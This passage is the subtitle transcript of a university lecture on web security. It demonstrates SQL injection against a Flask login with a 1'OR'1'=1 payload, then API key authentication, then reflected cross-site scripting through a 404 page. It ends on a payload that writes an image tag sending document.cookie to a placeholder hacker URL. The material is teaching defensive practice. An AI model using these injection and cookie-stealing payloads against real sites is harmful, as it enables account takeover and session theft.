but this isn't strictly necessary. 833 00:36:57,220 --> 00:36:59,590 The interesting thing is here, on line 33. 834 00:36:59,590 --> 00:37:03,040 We're running db.execute, running a database query, and saying, 835 00:37:03,040 --> 00:37:06,340 select star from users where username equals 836 00:37:06,340 --> 00:37:08,810 and then plugging in the username here, and password 837 00:37:08,810 --> 00:37:11,560 equals, plugging in the password there, and then 838 00:37:11,560 --> 00:37:15,070 just getting the first row that comes back from that. 839 00:37:15,070 --> 00:37:18,100 And if a row does come back from that, if the query was successful, 840 00:37:18,100 --> 00:37:21,130 then and we log the user in by storing them inside the session 841 00:37:21,130 --> 00:37:23,840 and redirecting them back to the index page. 842 00:37:23,840 --> 00:37:27,970 In other words, we render the login page again, saying invalid=True, 843 00:37:27,970 --> 00:37:30,790 meaning there was some authentication problem. 844 00:37:30,790 --> 00:37:33,280 So that's all fairly straightforward. 845 00:37:33,280 --> 00:37:35,757 And of course, the key vulnerability to look at here 846 00:37:35,757 --> 00:37:38,590 is the fact that whatever the username and whatever the password is, 847 00:37:38,590 --> 00:37:40,900 we just plugged them straight into the SQL query 848 00:37:40,900 --> 00:37:45,530 by just using string concatenation in Python to join this all together. 849 00:37:45,530 --> 00:37:53,830 So now if I were to run this Flask application and take this URL 850 00:37:53,830 --> 00:37:56,890 and go to that URL, I'm faced with this login form. 851 00:37:56,890 --> 00:37:58,700 And I can type in Alice-- 852 00:37:58,700 --> 00:38:01,690 and normally you would want your password field 853 00:38:01,690 --> 00:38:05,652 to use dots by setting the input type to be passwords so nobody can see it, 854 00:38:05,652 --> 00:38:08,110 but for the sake of example, so you can see what I'm doing, 855 00:38:08,110 --> 00:38:10,540 I've changed the password field to just be a text field so you can 856 00:38:10,540 --> 00:38:12,190 see what password is being typed in. 857 00:38:12,190 --> 00:38:15,240 But of course, you would never actually want to do that in practice. 858 00:38:15,240 --> 00:38:18,010 But if I type hello as the password, which is Alice's password, 859 00:38:18,010 --> 00:38:19,980 and click Submit, now I'm logged in as Alice. 860 00:38:19,980 --> 00:38:21,850 It says, Welcome, alice. 861 00:38:21,850 --> 00:38:23,744 And you can check by looking at the log. 862 00:38:23,744 --> 00:38:24,910 Here's what got printed out. 863 00:38:24,910 --> 00:38:26,170 Here was the query that ran. 864 00:38:26,170 --> 00:38:30,190 Select star from users, where username equals Alice and password equals hello, 865 00:38:30,190 --> 00:38:32,580 and of course, that returned back Alice as my one row, 866 00:38:32,580 --> 00:38:34,980 and so that was all good. 867 00:38:34,980 --> 00:38:36,510 I'll log out now. 868 00:38:36,510 --> 00:38:39,790 If I try logging in with Alice with a fake password, goodbye, 869 00:38:39,790 --> 00:38:41,920 which is not the correct password, and Submit, 870 00:38:41,920 --> 00:38:44,050 I get Error, invalid credentials. 871 00:38:44,050 --> 00:38:44,565 Why is that? 872 00:38:44,565 --> 00:38:45,940 Well, here is the query that ran. 873 00:38:45,940 --> 00:38:50,620 Select star from users, where user name is Alice and password equals goodbye. 874 00:38:50,620 --> 00:38:53,160 Well, that's not going to return any results. 875 00:38:53,160 --> 00:38:56,230 But of course, the injection attack happens if I type user name Alice, 876 00:38:56,230 --> 00:39:06,157 or user name, any user name that I want, and type in 1'OR'1'=1, like that, 877 00:39:06,157 --> 00:39:09,240 where now if I submit that, no matter who the user is, now I see, Welcome, 878 00:39:09,240 --> 00:39:09,740 alice. 879 00:39:09,740 --> 00:39:12,750 I've logged into this user's account, and why did that happen? 880 00:39:12,750 --> 00:39:14,250 Well, here's the query that was run. 881 00:39:14,250 --> 00:39:19,440 Select star from users where username equals Alice and password equals 1 or 1 882 00:39:19,440 --> 00:39:20,040 equals 1. 883 00:39:20,040 --> 00:39:23,700 So by injecting arbitrary SQL logic into this code, 884 00:39:23,700 --> 00:39:26,854 I was able to gain access to any user account that I wanted to. 885 00:39:26,854 --> 00:39:28,770 And that's why it's very important, when we're 886 00:39:28,770 --> 00:39:32,640 using SQL and running SQL queries, that we're careful to avoid SQL injection. 887 00:39:32,640 --> 00:39:35,940 That any time user input is being put into a query, 888 00:39:35,940 --> 00:39:38,820 we want to escape any potential characters that 889 00:39:38,820 --> 00:39:42,090 might be part of a SQL query in order to make sure 890 00:39:42,090 --> 00:39:44,520 that nobody can just run whatever SQL queries 891 00:39:44,520 --> 00:39:46,710 they want to inside of our code. 892 00:39:46,710 --> 00:39:49,380 And SQLAlchemy, which you may have been using in Python in order 893 00:39:49,380 --> 00:39:51,720 to do some of this stuff, automatically takes 894 00:39:51,720 --> 00:39:54,210 care of doing some of that escaping for you, 895 00:39:54,210 --> 00:39:56,940 if you're passing in the parameters in a Python dictionary 896 00:39:56,940 --> 00:39:58,980 for instance, which you might have done before. 897 00:39:58,980 --> 00:40:02,980 And so that's certainly something you can use as well. 898 00:40:02,980 --> 00:40:05,490 Questions about SQL vulnerabilities? 899 00:40:05,490 --> 00:40:08,910 Whether it was reasons why we might want to use hashed passwords inside 900 00:40:08,910 --> 00:40:11,655 of our database or how we might accidentally leak information, 901 00:40:11,655 --> 00:40:15,060 as via that forgot your password page, or as 902 00:40:15,060 --> 00:40:18,090 to how we might have gone about using SQL injection 903 00:40:18,090 --> 00:40:20,370 to gain access to unauthorized data. 904 00:40:20,370 --> 00:40:23,730 905 00:40:23,730 --> 00:40:25,250 OK. 906 00:40:25,250 --> 00:40:27,770 Next up, before we take our break, was about APIs. 907 00:40:27,770 --> 00:40:31,130 So we were thinking about Application Programming Interfaces, the idea 908 00:40:31,130 --> 00:40:34,670 that people could write APIs for their web applications 909 00:40:34,670 --> 00:40:39,406 that let people programmatically gain access to information about whatever it 910 00:40:39,406 --> 00:40:41,030 is that your website is designed to do. 911 00:40:41,030 --> 00:40:42,980 So in the case of book reviews, maybe you 912 00:40:42,980 --> 00:40:45,962 had an API route that returned the reviews for a particular book. 913 00:40:45,962 --> 00:40:48,170 But you might imagine that other sites might give you 914 00:40:48,170 --> 00:40:49,550 API routes that do other things. 915 00:40:49,550 --> 00:40:51,383 We didn't do this for project three, but you 916 00:40:51,383 --> 00:40:55,160 might imagine that in a restaurant, for instance, that had a website, 917 00:40:55,160 --> 00:40:58,340 you might have an API route that gives you back your orders, for instance. 918 00:40:58,340 --> 00:41:01,832 What security considerations should go into designing APIs? 919 00:41:01,832 --> 00:41:03,290 Or what could potentially go wrong? 920 00:41:03,290 --> 00:41:05,932 921 00:41:05,932 --> 00:41:07,890 Broad questions, so lots of possibilities here. 922 00:41:07,890 --> 00:41:15,330 923 00:41:15,330 --> 00:41:18,310 AUDIENCE: You can expose stuff that shouldn't be exposed. 924 00:41:18,310 --> 00:41:20,685 BRIAN YU: You can expose stuff that shouldn't be exposed. 925 00:41:20,685 --> 00:41:23,140 So that's an interesting idea, that if I, for instance, 926 00:41:23,140 --> 00:41:27,840 had an API for being able to look at my Amazon orders or look at the food 927 00:41:27,840 --> 00:41:30,090 that I've ordered from a restaurant in particular, 928 00:41:30,090 --> 00:41:32,940 I would want that to somehow only be accessible to me 929 00:41:32,940 --> 00:41:34,810 and not accessible to someone else. 930 00:41:34,810 --> 00:41:38,340 And so how would we implement this idea of some people 931 00:41:38,340 --> 00:41:41,070 should be able to access certain information by the API, 932 00:41:41,070 --> 00:41:44,040 and other people should not be able to access that information 933 00:41:44,040 --> 00:41:49,180 and should only be able to access some other pieces of information? 934 00:41:49,180 --> 00:41:50,247 AUDIENCE: Authentication. 935 00:41:50,247 --> 00:41:51,580 BRIAN YU: Authentication, great. 936 00:41:51,580 --> 00:41:54,910 We can use what are commonly known as API keys, which are just 937 00:41:54,910 --> 00:41:57,940 strings of text that are associated with a particular user, 938 00:41:57,940 --> 00:42:00,460 effectively like a password, but for APIs. 939 00:42:00,460 --> 00:42:02,472 Such that in order to make an API request, 940 00:42:02,472 --> 00:42:04,180 you not only need to submit your request, 941 00:42:04,180 --> 00:42:06,370 but you also need to submit your API key. 942 00:42:06,370 --> 00:42:09,200 And then it's on the web application to check that key, to say, 943 00:42:09,200 --> 00:42:13,490 does this key have permission to look at the things that it's trying to look at? 944 00:42:13,490 --> 00:42:15,370 And this is the idea of route authentication, 945 00:42:15,370 --> 00:42:17,860 that if someone makes an API request to a particular route, 946 00:42:17,860 --> 00:42:21,310 you better first make sure that whoever is making that request has permission 947 00:42:21,310 --> 00:42:24,710 to see whatever they're asking to see before you actually show it to them. 948 00:42:24,710 --> 00:42:26,890 And so API keys can be used for that as well. 949 00:42:26,890 --> 00:42:29,200 In addition, they're often used for rate limiting, 950 00:42:29,200 --> 00:42:32,116 where if you're worried about someone over using an API 951 00:42:32,116 --> 00:42:34,990 or abusing your server of making thousands upon thousands of requests 952 00:42:34,990 --> 00:42:37,090 in a short period of time, you can rate limit 953 00:42:37,090 --> 00:42:40,060 and say, well, I only want you to be able to make 954 00:42:40,060 --> 00:42:42,440 x number of requests per hour. 955 00:42:42,440 --> 00:42:44,770 And if you have an API key, then it's pretty easy 956 00:42:44,770 --> 00:42:47,520 to implement this idea of rate limiting because all you have to do 957 00:42:47,520 --> 00:42:50,410 is keep track inside of a table somewhere this API key 958 00:42:50,410 --> 00:42:54,220 has used 28 requests in the last hour, so they're hitting up on their limit. 959 00:42:54,220 --> 00:42:56,320 And so if they use any more, we should just 960 00:42:56,320 --> 00:42:59,890 stop allowing them to use the API key until it refreshes for the next hour, 961 00:42:59,890 --> 00:43:00,850 for instance. 962 00:43:00,850 --> 00:43:05,170 And so in your project, you might not have needed to use an API key, 963 00:43:05,170 --> 00:43:08,500 but anytime you want to deal with potentially authenticated data 964 00:43:08,500 --> 00:43:11,950 or you want to rate limit, then you'll want to think about using an API key 965 00:43:11,950 --> 00:43:14,350 like you did have to use with the good reads API 966 00:43:14,350 --> 00:43:17,110 in order to take advantage of features like rate 967 00:43:17,110 --> 00:43:19,180 limiting or authenticating particular routes 968 00:43:19,180 --> 00:43:21,700 to make sure that only certain users have the ability 969 00:43:21,700 --> 00:43:24,490 to access particular routes. 970 00:43:24,490 --> 00:43:27,350 Questions about that? 971 00:43:27,350 --> 00:43:27,850 All right. 972 00:43:27,850 --> 00:43:30,110 In that case, we'll take a short break and when we come back, 973 00:43:30,110 --> 00:43:33,160 we'll take a look at JavaScript and look at the many different kinds of security 974 00:43:33,160 --> 00:43:35,110 vulnerabilities that come about when we start 975 00:43:35,110 --> 00:43:39,057 introducing JavaScript and client-side code into our web applications. 976 00:43:39,057 --> 00:43:41,860 977 00:43:41,860 --> 00:43:42,760 Welcome back. 978 00:43:42,760 --> 00:43:45,370 So we're at about the midway point in the course, 979 00:43:45,370 --> 00:43:47,320 and then we started to talk about JavaScript. 980 00:43:47,320 --> 00:43:49,690 And so JavaScript, if you recall, was the language 981 00:43:49,690 --> 00:43:51,537 that we were using in order to write code 982 00:43:51,537 --> 00:43:54,370 on the client side, code that was actually running inside the user's 983 00:43:54,370 --> 00:43:57,640 browser and not on the server where Flask or Django was running, 984 00:43:57,640 --> 00:43:58,540 for instance. 985 00:43:58,540 --> 00:44:02,272 And this leads to a whole new host of potential security vulnerabilities. 986 00:44:02,272 --> 00:44:03,730 So let's start to chat about these. 987 00:44:03,730 --> 00:44:05,377 What could go wrong? 988 00:44:05,377 --> 00:44:07,210 What sorts of exploits could happen, can you 989 00:44:07,210 --> 00:44:10,830 think of, when we start to introduce JavaScript into the equation? 990 00:44:10,830 --> 00:44:13,350 Code that can run inside the user's browser. 991 00:44:13,350 --> 00:44:14,514 Yeah? 992 00:44:14,514 --> 00:44:18,820 AUDIENCE: When we [INAUDIBLE] information, [INAUDIBLE] even that it 993 00:44:18,820 --> 00:44:19,981 can change. 994 00:44:19,981 --> 00:44:28,430 Like someone's address [INAUDIBLE] that changing someone's 995 00:44:28,430 --> 00:44:33,484 address to someone else and using JavaScript [INAUDIBLE].. 996 00:44:33,484 --> 00:44:34,150 BRIAN YU: Great. 997 00:44:34,150 --> 00:44:36,760 So JavaScript has all these event handlers that we've talked about, 998 00:44:36,760 --> 00:44:39,130 whether on load or on click, that can do various things. 999 00:44:39,130 --> 00:44:41,837 And potentially, if someone clicks on something in code that 1000 00:44:41,837 --> 00:44:43,670 does something malicious that's able to run, 1001 00:44:43,670 --> 00:44:45,670 it can make something potentially bad happen. 1002 00:44:45,670 --> 00:44:48,610 And we'll take a look at at least one example of that definitely 1003 00:44:48,610 --> 00:44:50,286 later on today. 1004 00:44:50,286 --> 00:44:52,160 Other things that could potentially go wrong? 1005 00:44:52,160 --> 00:44:54,618 There are a lot of potential security vulnerabilities here. 1006 00:44:54,618 --> 00:44:56,210 So let's just toss out some ideas. 1007 00:44:56,210 --> 00:45:00,642 1008 00:45:00,642 --> 00:45:02,350 What would we want to avoid happening now 1009 00:45:02,350 --> 00:45:05,110 that we have JavaScript code that can run inside the browser? 1010 00:45:05,110 --> 00:45:09,022 1011 00:45:09,022 --> 00:45:15,974 AUDIENCE: Someone might redirect from the site you're on to another site. 1012 00:45:15,974 --> 00:45:16,640 BRIAN YU: Great. 1013 00:45:16,640 --> 00:45:18,620 Certainly, someone might try and redirect from the site 1014 00:45:18,620 --> 00:45:19,828 you're on to some other site. 1015 00:45:19,828 --> 00:45:22,850 That we've looked at ways that we can use JavaScript in order 1016 00:45:22,850 --> 00:45:25,170 to redirect someone from one place to another. 1017 00:45:25,170 --> 00:45:27,800 And if we're not careful, that JavaScript code 1018 00:45:27,800 --> 00:45:30,860 might be able to redirect the user to someplace that the user doesn't 1019 00:45:30,860 --> 00:45:32,090 necessarily want to be. 1020 00:45:32,090 --> 00:45:35,760 And so we'll definitely look at an example of that later on, too. 1021 00:45:35,760 --> 00:45:37,870 So that's definitely one potential vulnerability. 1022 00:45:37,870 --> 00:45:38,370 Yeah? 1023 00:45:38,370 --> 00:45:41,529 AUDIENCE: So like with HTML and CSS, it was all static, just 1024 00:45:41,529 --> 00:45:42,656 like what a user sees. 1025 00:45:42,656 --> 00:45:44,364 But with JavaScript, you can actually use 1026 00:45:44,364 --> 00:45:46,632 it to run code on someone's machine. 1027 00:45:46,632 --> 00:45:51,980 So if you write a malicious code, you can [INAUDIBLE] someone's computer. 1028 00:45:51,980 --> 00:45:52,730 BRIAN YU: Exactly. 1029 00:45:52,730 --> 00:45:55,700 So with HTML and CSS, we didn't really need 1030 00:45:55,700 --> 00:45:58,490 to have to worry about code actually running for the most part 1031 00:45:58,490 --> 00:46:00,770 because it was just here's the way that things look. 1032 00:46:00,770 --> 00:46:03,767 And certainly we were able to use that to try and trick users 1033 00:46:03,767 --> 00:46:06,350 by creating a link that looked like it went to Bank of America 1034 00:46:06,350 --> 00:46:09,030 but actually went to my version of some different site. 1035 00:46:09,030 --> 00:46:11,540 But when it comes to JavaScript, now we really 1036 00:46:11,540 --> 00:46:16,130 have the potential for malicious code to be running on the user's web browser. 1037 00:46:16,130 --> 00:46:18,950 And so how does that code get to the user's web browser? 1038 00:46:18,950 --> 00:46:24,500 How does malicious code enter into some other seemingly benign site, 1039 00:46:24,500 --> 00:46:27,322 and why might those be potential exploits? 1040 00:46:27,322 --> 00:46:30,530 So where we'll start is by looking at one potential JavaScript exploit, which 1041 00:46:30,530 --> 00:46:33,240 is quite common, called cross-site scripting. 1042 00:46:33,240 --> 00:46:35,450 Where the idea of cross-site scripting is 1043 00:46:35,450 --> 00:46:38,300 that we're going to try and look for a vulnerability 1044 00:46:38,300 --> 00:46:41,220 where we can-- in the same way that in the SQL case, 1045 00:46:41,220 --> 00:46:45,890 we were able to inject whatever SQL code we wanted into being run on a database, 1046 00:46:45,890 --> 00:46:49,355 a malicious user, if they are able to send the right link to the right person 1047 00:46:49,355 --> 00:46:51,230 and get them to click on a link for instance, 1048 00:46:51,230 --> 00:46:55,820 are able to get some arbitrary JavaScript code to run inside 1049 00:46:55,820 --> 00:46:57,700 of the user's web browser. 1050 00:46:57,700 --> 00:47:00,952 And so let's take a look at a very simple Flask application. 1051 00:47:00,952 --> 00:47:03,410 This is in fact, the entire Flask application, the contents 1052 00:47:03,410 --> 00:47:05,930 of application.py, for example. 1053 00:47:05,930 --> 00:47:09,254 And there is in fact, a major cross-site scripting 1054 00:47:09,254 --> 00:47:11,420 vulnerability inside this application, and see if we 1055 00:47:11,420 --> 00:47:13,320 can tease apart where exactly that is. 1056 00:47:13,320 --> 00:47:16,010 So at the beginning, we import Flask, and we import request, 1057 00:47:16,010 --> 00:47:17,780 which we'll need access to later. 1058 00:47:17,780 --> 00:47:22,430 We create a new Flask application inside the current module. 1059 00:47:22,430 --> 00:47:25,880 Then we define a default route, just when you go to the slash route. 1060 00:47:25,880 --> 00:47:29,120 It calls this index function that returns Hello, world. 1061 00:47:29,120 --> 00:47:32,420 And then down here, we have app.errorhandler(404). 1062 00:47:32,420 --> 00:47:34,640 So you may not have seen this before, but Flask 1063 00:47:34,640 --> 00:47:37,340 has built in error handlers that are specific functions that 1064 00:47:37,340 --> 00:47:39,590 run when specific error codes happen. 1065 00:47:39,590 --> 00:47:41,930 So 404, you might recall, is the error code 1066 00:47:41,930 --> 00:47:44,210 for not found when someone goes to a page that 1067 00:47:44,210 --> 00:47:45,920 doesn't exist on the web server. 1068 00:47:45,920 --> 00:47:50,390 And what Flask can do for you is say whenever a 404 error happens on the web 1069 00:47:50,390 --> 00:47:54,230 server, go ahead and run this function, which is going to supposedly render 1070 00:47:54,230 --> 00:47:55,650 my 404 error page. 1071 00:47:55,650 --> 00:47:57,870 And you can do the same thing for error 500, 1072 00:47:57,870 --> 00:48:00,940 for example, internal server errors, or 403, forbidden errors, 1073 00:48:00,940 --> 00:48:02,806 or any other errors status code you want. 1074 00:48:02,806 --> 00:48:05,180 If you want particular code to run, a particular template 1075 00:48:05,180 --> 00:48:09,470 to be displayed when a particular error code happens on your web application, 1076 00:48:09,470 --> 00:48:12,320 you can use a Flask's built in error handler 1077 00:48:12,320 --> 00:48:15,450 to be able to handle those particular situations. 1078 00:48:15,450 --> 00:48:18,650 So what we have here is a function that is supposed to handle 404 errors, 1079 00:48:18,650 --> 00:48:20,540 that handles a page not found error. 1080 00:48:20,540 --> 00:48:23,390 It calls this page not found function, and all the page not 1081 00:48:23,390 --> 00:48:26,670 found function is going to do is say return not found. 1082 00:48:26,670 --> 00:48:30,080 And then it's going to append request.path, where request.path 1083 00:48:30,080 --> 00:48:32,930 is what the URL was that the user tried to go 1084 00:48:32,930 --> 00:48:35,900 to that resulted in the 404 error. 1085 00:48:35,900 --> 00:48:38,070 And so what might that mean? 1086 00:48:38,070 --> 00:48:41,090 It means that if a user goes to /foo, for example, 1087 00:48:41,090 --> 00:48:43,150 then what's going to happen is-- 1088 00:48:43,150 --> 00:48:50,591 I'll go ahead and go into cross-site scripting zero 1089 00:48:50,591 --> 00:48:52,340 and go ahead and run this web application, 1090 00:48:52,340 --> 00:48:53,652 running that very same code. 1091 00:48:53,652 --> 00:48:55,860 So I get hello, world when I go to the default route, 1092 00:48:55,860 --> 00:48:58,110 don't type in anything after the URL. 1093 00:48:58,110 --> 00:49:02,276 But if I go to /foo for example, what do I expect to see? 1094 00:49:02,276 --> 00:49:03,374 AUDIENCE: Error not found. 1095 00:49:03,374 --> 00:49:04,040 BRIAN YU: Great. 1096 00:49:04,040 --> 00:49:08,300 Not Found: foo, because not found was the initial message that 1097 00:49:08,300 --> 00:49:10,340 happens when I do a 404 error message. 1098 00:49:10,340 --> 00:49:14,180 And then /foo is the path, the request path that I tried to request. 1099 00:49:14,180 --> 00:49:15,680 And so this might be pretty typical. 1100 00:49:15,680 --> 00:49:17,690 That if I go to a URL that doesn't exist, 1101 00:49:17,690 --> 00:49:20,510 I probably expect a page like this to show up that says, sorry, 1102 00:49:20,510 --> 00:49:22,760 this route, this path that you were trying to request, 1103 00:49:22,760 --> 00:49:25,650 couldn't be found on the web server. 1104 00:49:25,650 --> 00:49:27,750 So what can go wrong there? 1105 00:49:27,750 --> 00:49:31,660 Here's the web application, where's the security vulnerability? 1106 00:49:31,660 --> 00:49:32,160 Yeah? 1107 00:49:32,160 --> 00:49:37,050 AUDIENCE: So someone maybe could somehow inject a script path 1108 00:49:37,050 --> 00:49:42,269 into your request path location. 1109 00:49:42,269 --> 00:49:43,310 BRIAN YU: Great, exactly. 1110 00:49:43,310 --> 00:49:45,920 So the vulnerability is with this request path. 1111 00:49:45,920 --> 00:49:51,260 That if someone is able to inject JavaScript code into this request 1112 00:49:51,260 --> 00:49:54,530 path, now suddenly, the thing that I'm returning 1113 00:49:54,530 --> 00:49:57,650 is not found colon, potentially some JavaScript 1114 00:49:57,650 --> 00:49:59,180 code that is then going to be run. 1115 00:49:59,180 --> 00:50:02,750 And you might imagine that if a hacker now is able to take one of these URLs 1116 00:50:02,750 --> 00:50:06,370 and convince a user to click on a link that takes them to a URL like that, 1117 00:50:06,370 --> 00:50:10,280 that takes them to this particular function in my Flask application, now 1118 00:50:10,280 --> 00:50:13,370 suddenly this hacker is able to run whatever JavaScript code they 1119 00:50:13,370 --> 00:50:15,980 want to inside of the web application. 1120 00:50:15,980 --> 00:50:17,340 So what might that look like? 1121 00:50:17,340 --> 00:50:22,030 Instead of just going to /foo as the route that returns a benign not found 1122 00:50:22,030 --> 00:50:30,020 /foo on the page, what if, for instance, the user typed in this as their URL? 1123 00:50:30,020 --> 00:50:36,320 Where after the slash, they type script alert hi /script, end JavaScript. 1124 00:50:36,320 --> 00:50:39,170 Now this is going to be the request path, which 1125 00:50:39,170 --> 00:50:42,290 means what gets put into return not found colon, 1126 00:50:42,290 --> 00:50:44,270 we're going to return some page that says not 1127 00:50:44,270 --> 00:50:46,700 found and then this JavaScript code. 1128 00:50:46,700 --> 00:50:51,400 This JavaScript code that says alert, hi. 1129 00:50:51,400 --> 00:50:53,570 So this is code now that if someone clicks on, 1130 00:50:53,570 --> 00:50:56,532 might potentially be executed by this web browser, 1131 00:50:56,532 --> 00:50:57,990 an example of cross-site scripting. 1132 00:50:57,990 --> 00:51:00,290 That someone is able to send me this link, 1133 00:51:00,290 --> 00:51:03,290 and they were able to inject random JavaScript, whatever they want, 1134 00:51:03,290 --> 00:51:05,550 into this particular application. 1135 00:51:05,550 --> 00:51:07,620 So let's try it. 1136 00:51:07,620 --> 00:51:10,220 So again, going to /foo, says Not Found, foo. 1137 00:51:10,220 --> 00:51:13,790 If I do a /bar, it says Not Found bar. 1138 00:51:13,790 --> 00:51:20,780 What's going to happen if I do script alert hi /script? 1139 00:51:20,780 --> 00:51:23,270 So here's my URL now. 1140 00:51:23,270 --> 00:51:28,220 Rather than type in foo or bar, I've added to this JavaScript code 1141 00:51:28,220 --> 00:51:30,470 to the URL and I'm going to try and run that. 1142 00:51:30,470 --> 00:51:32,363 What's going to happen? 1143 00:51:32,363 --> 00:51:34,112 AUDIENCE: An alert. 1144 00:51:34,112 --> 00:51:35,070 AUDIENCE: Get an alert. 1145 00:51:35,070 --> 00:51:35,790 BRIAN YU: We'll get an alert. 1146 00:51:35,790 --> 00:51:37,710 That's what we expect to happen, at least. 1147 00:51:37,710 --> 00:51:40,680 In fact, Chrome is getting pretty good at this. 1148 00:51:40,680 --> 00:51:43,380 Chrome and other web browsers have built-in security features. 1149 00:51:43,380 --> 00:51:44,760 So Chrome actually stopped me. 1150 00:51:44,760 --> 00:51:47,700 It gave me this page that says, this page isn't working. 1151 00:51:47,700 --> 00:51:49,800 Chrome detected unusual code on this page 1152 00:51:49,800 --> 00:51:52,020 and blocked it to protect your personal information, 1153 00:51:52,020 --> 00:51:54,353 for example, passwords, phone numbers, and credit cards. 1154 00:51:54,353 --> 00:51:57,930 And if we look down here, it says error, blocked by XSS, 1155 00:51:57,930 --> 00:52:01,980 or cross-site scripting, error blocked by cross-site scripting auditor. 1156 00:52:01,980 --> 00:52:03,900 So Chrome's got some built-in feature here 1157 00:52:03,900 --> 00:52:06,150 that's checking for potential cross-site scripting, 1158 00:52:06,150 --> 00:52:08,400 like what we just tried to do, and it's blocking me 1159 00:52:08,400 --> 00:52:09,924 from getting access to this page. 1160 00:52:09,924 --> 00:52:12,840 And this defends against certainly some kinds of cross-site scripting, 1161 00:52:12,840 --> 00:52:13,560 but not all. 1162 00:52:13,560 --> 00:52:17,610 And we'll see an example of one which bypasses Chrome in just a moment. 1163 00:52:17,610 --> 00:52:19,710 And certainly you can't rely on all web browsers 1164 00:52:19,710 --> 00:52:22,860 to be able to have this built-in cross-site scripting auditor built in, 1165 00:52:22,860 --> 00:52:25,800 so these are definitely still things to be careful about. 1166 00:52:25,800 --> 00:52:29,070 So what would happen if this auditor didn't exist, if it wasn't in place? 1167 00:52:29,070 --> 00:52:30,420 We can actually find out. 1168 00:52:30,420 --> 00:52:33,780 That Chrome actually lets us, if I run Chrome from the command line 1169 00:52:33,780 --> 00:52:38,640 and run Chrome dash, dash, disable xss auditor, 1170 00:52:38,640 --> 00:52:41,640 I can run Chrome without running the cross-site scripting auditor. 1171 00:52:41,640 --> 00:52:43,230 Just turn that auditor off. 1172 00:52:43,230 --> 00:52:47,970 And now if I go here, slash script alert high, just like I did before, 1173 00:52:47,970 --> 00:52:51,810 and press Return, now I get the alert that says hi. 1174 00:52:51,810 --> 00:52:54,390 I've injected JavaScript code into this page, 1175 00:52:54,390 --> 00:52:57,300 and after I press OK, now it says not found, slash. 1176 00:52:57,300 --> 00:53:00,270 And of course that seemed relatively benign, 1177 00:53:00,270 --> 00:53:02,040 that an alert certainly showed up. 1178 00:53:02,040 --> 00:53:05,010 JavaScript code was running, but nothing was really compromised. 1179 00:53:05,010 --> 00:53:06,900 So where might this go wrong? 1180 00:53:06,900 --> 00:53:09,150 Where could this really become a problem? 1181 00:53:09,150 --> 00:53:14,170 Can anyone think of why this might really start to become an issue? 1182 00:53:14,170 --> 00:53:15,670 Injecting arbitrary JavaScript code. 1183 00:53:15,670 --> 00:53:15,900 Yeah? 1184 00:53:15,900 --> 00:53:17,960 AUDIENCE: An executable could be put in there. 1185 00:53:17,960 --> 00:53:18,626 BRIAN YU: Great. 1186 00:53:18,626 --> 00:53:21,480 Any executable thing could be put into this JavaScript code 1187 00:53:21,480 --> 00:53:23,070 so that any code could run. 1188 00:53:23,070 --> 00:53:26,070 And in particular, that means that anything 1189 00:53:26,070 --> 00:53:29,160 could happen on the web browser, including potentially 1190 00:53:29,160 --> 00:53:31,650 secure information being exposed. 1191 00:53:31,650 --> 00:53:36,036 And so in the case of Flask and when we talked about logging 1192 00:53:36,036 --> 00:53:38,410 in and logging out, we've talked about this a little bit, 1193 00:53:38,410 --> 00:53:40,650 how does the browser know-- 1194 00:53:40,650 --> 00:53:44,100 or when the server is-- when someone logs into a website 1195 00:53:44,100 --> 00:53:46,290 and the server says, OK, this user is now logged in. 1196 00:53:46,290 --> 00:53:49,331 When I go and click on another button, how does the browser or the server 1197 00:53:49,331 --> 00:53:51,830 still know that I'm the one logged into the website? 1198 00:53:51,830 --> 00:53:52,770 AUDIENCE: Session. 1199 00:53:52,770 --> 00:53:54,145 BRIAN YU: The session, certainly. 1200 00:53:54,145 --> 00:53:55,075 And how does that-- 1201 00:53:55,075 --> 00:53:58,741 or what do we know from the-- what's happening on the client side? 1202 00:53:58,741 --> 00:54:00,990 How does it know that it's coming from the same place? 1203 00:54:00,990 --> 00:54:03,450 That it's the same user that's making that request? 1204 00:54:03,450 --> 00:54:04,650 AUDIENCE: It's in a cookie. 1205 00:54:04,650 --> 00:54:06,066 BRIAN YU: Inside of a cookie, yes. 1206 00:54:06,066 --> 00:54:09,364 So that we've got some cookie, some information, stored in our computer. 1207 00:54:09,364 --> 00:54:12,280 That is the cookie that tells the server-- it's like a hand stamp that 1208 00:54:12,280 --> 00:54:13,236 says, yes, this is me. 1209 00:54:13,236 --> 00:54:15,360 Show me the same page that I was looking at before. 1210 00:54:15,360 --> 00:54:16,550 I'm still logged in. 1211 00:54:16,550 --> 00:54:19,696 And we talked about if someone were ever to get access to that cookie, 1212 00:54:19,696 --> 00:54:21,320 then they would be able to login as us. 1213 00:54:21,320 --> 00:54:24,060 They could pretend to be us and therefore use our credentials, 1214 00:54:24,060 --> 00:54:26,310 and the server wouldn't be able to tell the difference 1215 00:54:26,310 --> 00:54:28,590 because that cookie is a valid cookie, for instance. 1216 00:54:28,590 --> 00:54:31,270 And so let's take a look at now, if it wasn't 1217 00:54:31,270 --> 00:54:36,030 this script that was being passed into the application, but this script. 1218 00:54:36,030 --> 00:54:38,440 Slightly different, slightly more complicated. 1219 00:54:38,440 --> 00:54:41,370 We've got /script, so we're starting JavaScript. 1220 00:54:41,370 --> 00:54:45,030 We say document.write, which is just a way of writing 1221 00:54:45,030 --> 00:54:48,960 new information, new text, into the HTML content of the page, 1222 00:54:48,960 --> 00:54:51,870 and we're adding an image, which seems sort of strange. 1223 00:54:51,870 --> 00:54:55,080 Image source equals hacker URL, where hacker URL 1224 00:54:55,080 --> 00:54:57,930 is some URL of some hacker's website. 1225 00:54:57,930 --> 00:55:03,177 And cookie equals, and then we added document.cookie, 1226 00:55:03,177 --> 00:55:05,760 which is going to represent the cookie for this particular web 1227 00:55:05,760 --> 00:55:07,920 browser, this particular page. 1228 00:55:07,920 --> 00:55:11,010 And then end angled bracket, and that's the end of the JavaScript. 1229 00:55:11,010 --> 00:55:17,190 We effectively just added an image tag into the page where the source of that 1230 00:55:17,190 --> 00:55:23,024 image is supposedly hacker_url?cookie=document.cookie. 1231 00:55:23,024 --> 00:55:23,940 Why is that a problem? 1232 00:55:23,940 --> 00:55:25,250 What's just happened here? 1233 00:55:25,250 --> 00:55:25,750 Yeah? 1234 00:55:25,750 --> 00:55:27,833 AUDIENCE: You're going to hit the hacker's website 1235 00:55:27,833 --> 00:55:31,650 and pass your cookie as a [INAUDIBLE]. 1236 00:55:31,650 --> 00:55:32,400 BRIAN YU: Exactly. 1237 00:55:32,400 --> 00:55:36,002 We're going to hit the hacker's website, and any time we're 1238 00:55:36,002 